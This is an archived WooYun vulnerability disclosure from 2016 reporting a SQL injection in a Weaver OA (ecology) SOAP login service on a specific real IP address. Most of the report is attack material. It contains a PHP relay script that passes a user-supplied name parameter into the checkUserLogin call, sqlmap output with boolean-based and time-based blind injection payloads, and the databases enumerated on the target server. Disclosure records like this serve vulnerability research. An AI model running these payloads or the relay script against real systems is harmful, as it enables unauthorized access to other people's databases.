乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-07-08: 细节已通知厂商并且等待厂商处理中 2016-07-08: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-07-13: 厂商已经主动忽略漏洞,细节向公众公开
支持峰会,求注册码一枚
http://180.167.72.216:88/login/Login.jsp
http://180.167.72.216:88//services/MobileService?wsdl
采用别人的中转脚本
<?php$in0=$_GET['name'];#$in0 = $in0."' and 'a' = 'a";header("content-type:text/html;charset=utf-8");try {$client = new SoapClient('http://180.167.72.216:88//services/MobileService?wsdl');$xml = "<SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:soap='http://schemas.xmlsoap.org/wsdl/soap/' xmlns:xsd='http://www.w3.org/1999/XMLSchema' xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' xmlns:m0='http://tempuri.org/' xmlns:SOAP-ENC='http://schemas.xmlsoap.org/soap/encoding/' xmlns:urn='webservices.services.weaver.com.cn' xmlns:urn2='http://workflow.webservices.mobile.weaver'> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:checkUserLogin> <urn:in0>1</urn:in0> <urn:in1>1</urn:in1> <urn:in2>1</urn:in2> </urn:checkUserLogin> </SOAP-ENV:Body></SOAP-ENV:Envelope>";$result=$client->checkUserLogin(array('in0'=>$in0,'in1'=>'123456','in2'=>1));echo $result->out ;//显示结果 } catch (SOAPFault $e) {print_r('Exception:'.$e);}?>
sqlmap resumed the following injection point(s) from stored session:---Parameter: name (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: name=sysadmin' AND 7195=7195 AND 'Hxbs'='Hxbs Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: name=sysadmin' OR 5806=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'veYf'='veYf---
数据库
available databases [7]:[*] ecology[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
删除了
危害等级:无影响厂商忽略
忽略时间:2016-07-13 09:30
漏洞Rank:8 (WooYun评价)
暂无